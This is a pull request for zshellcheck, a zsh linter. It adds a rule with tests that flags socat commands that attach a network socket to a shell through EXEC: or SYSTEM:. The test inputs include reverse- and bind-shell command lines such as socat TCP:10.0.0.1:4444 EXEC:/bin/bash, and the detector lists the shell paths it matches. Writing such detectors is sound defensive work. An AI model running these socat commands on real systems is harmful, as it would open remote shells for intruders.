### PR TITLE
feat: ZC1490 — error on socat EXEC:<shell> / SYSTEM:<shell> (reverse-shell pattern)

### DIFF
--- a/pkg/katas/katatests/zc1490_test.go
+++ b/pkg/katas/katatests/zc1490_test.go
@@ -1,0 +1,70 @@
+package katas
+
+import (
+	"testing"
+
+	"github.com/afadesigns/zshellcheck/pkg/katas"
+	"github.com/afadesigns/zshellcheck/pkg/testutil"
+)
+
+func TestZC1490(t *testing.T) {
+	tests := []struct {
+		name     string
+		input    string
+		expected []katas.Violation
+	}{
+		{
+			name:     "valid — socat - TCP:host:port",
+			input:    `socat - TCP:example.com:443`,
+			expected: []katas.Violation{},
+		},
+		{
+			name:     "valid — socat with EXEC:custom-tool",
+			input:    `socat TCP-LISTEN:8080,fork EXEC:/usr/local/bin/backend`,
+			expected: []katas.Violation{},
+		},
+		{
+			name:  "invalid — socat TCP:... EXEC:/bin/bash",
+			input: `socat TCP:10.0.0.1:4444 EXEC:/bin/bash`,
+			expected: []katas.Violation{
+				{
+					KataID:  "ZC1490",
+					Message: "`socat` pointed at a shell via `EXEC:` / `SYSTEM:` — matches the classic reverse/bind-shell pattern. Gate behind explicit authorization.",
+					Line:    1,
+					Column:  1,
+				},
+			},
+		},
+		{
+			name:  "invalid — socat TCP-LISTEN:... EXEC:\"/bin/sh -i\"",
+			input: `socat TCP-LISTEN:4444 EXEC:"/bin/sh -i",pty,stderr`,
+			expected: []katas.Violation{
+				{
+					KataID:  "ZC1490",
+					Message: "`socat` pointed at a shell via `EXEC:` / `SYSTEM:` — matches the classic reverse/bind-shell pattern. Gate behind explicit authorization.",
+					Line:    1,
+					Column:  1,
+				},
+			},
+		},
+		{
+			name:  "invalid — socat SYSTEM:/bin/sh",
+			input: `socat tcp:host:port SYSTEM:/bin/sh`,
+			expected: []katas.Violation{
+				{
+					KataID:  "ZC1490",
+					Message: "`socat` pointed at a shell via `EXEC:` / `SYSTEM:` — matches the classic reverse/bind-shell pattern. Gate behind explicit authorization.",
+					Line:    1,
+					Column:  1,
+				},
+			},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			violations := testutil.Check(tt.input, "ZC1490")
+			testutil.AssertViolations(t, tt.input, violations, tt.expected)
+		})
+	}
+}

--- a/pkg/katas/zc1490.go
+++ b/pkg/katas/zc1490.go
@@ -1,0 +1,59 @@
+package katas
+
+import (
+	"strings"
+
+	"github.com/afadesigns/zshellcheck/pkg/ast"
+)
+
+func init() {
+	RegisterKata(ast.SimpleCommandNode, Kata{
+		ID:       "ZC1490",
+		Title:    "Error on `socat ... EXEC:<shell>` / `SYSTEM:<shell>` — socat reverse-shell pattern",
+		Severity: SeverityError,
+		Description: "The `EXEC:` and `SYSTEM:` socat address types spawn a subprocess connected " +
+			"to the other socat endpoint. Paired with `TCP:` or `TCP-LISTEN:`, they form the " +
+			"second-most-common reverse/bind shell payload after `nc -e`. Legitimate uses exist " +
+			"(test harnesses, pty brokers) but should be gated behind explicit authorization " +
+			"and a non-shell command. Scan hits are worth a look.",
+		Check: checkZC1490,
+	})
+}
+
+func checkZC1490(node ast.Node) []Violation {
+	cmd, ok := node.(*ast.SimpleCommand)
+	if !ok {
+		return nil
+	}
+
+	ident, ok := cmd.Name.(*ast.Identifier)
+	if !ok {
+		return nil
+	}
+	if ident.Value != "socat" {
+		return nil
+	}
+
+	for _, arg := range cmd.Arguments {
+		v := arg.String()
+		low := strings.ToLower(v)
+		// EXEC:/bin/bash or "EXEC:\"/bin/sh -i\",pty,stderr"
+		if strings.Contains(low, "exec:/bin/bash") ||
+			strings.Contains(low, "exec:/bin/sh") ||
+			strings.Contains(low, "exec:/bin/zsh") ||
+			strings.Contains(low, "exec:\"/bin/bash") ||
+			strings.Contains(low, "exec:\"/bin/sh") ||
+			strings.Contains(low, "system:/bin/bash") ||
+			strings.Contains(low, "system:/bin/sh") {
+			return []Violation{{
+				KataID: "ZC1490",
+				Message: "`socat` pointed at a shell via `EXEC:` / `SYSTEM:` — matches the " +
+					"classic reverse/bind-shell pattern. Gate behind explicit authorization.",
+				Line:   cmd.Token.Line,
+				Column: cmd.Token.Column,
+				Level:  SeverityError,
+			}}
+		}
+	}
+	return nil
+}

--- a/pkg/version/version.go
+++ b/pkg/version/version.go
@@ -2,5 +2,5 @@ package version
 
 // Version is the current version of ZShellCheck.
 // It is calculated based on the number of implemented Katas.
-// 486 Katas = 0.4.86
-const Version = "0.4.86"
+// 487 Katas = 0.4.87
+const Version = "0.4.87"


### PR DESCRIPTION
## Summary
- Flags `socat ... EXEC:/bin/{sh,bash,zsh}` and `SYSTEM:` variants (incl. quoted `EXEC:"/bin/sh -i"`)
- Complements ZC1489 (`nc -e`) — canonical reverse-shell pattern
- Legitimate EXEC: with non-shell binaries is allowed
- Severity: Error

## Test plan
- [x] `go test ./...`
- [x] `golangci-lint run ./...`
- [x] Version bumped to 0.4.87 (487 katas)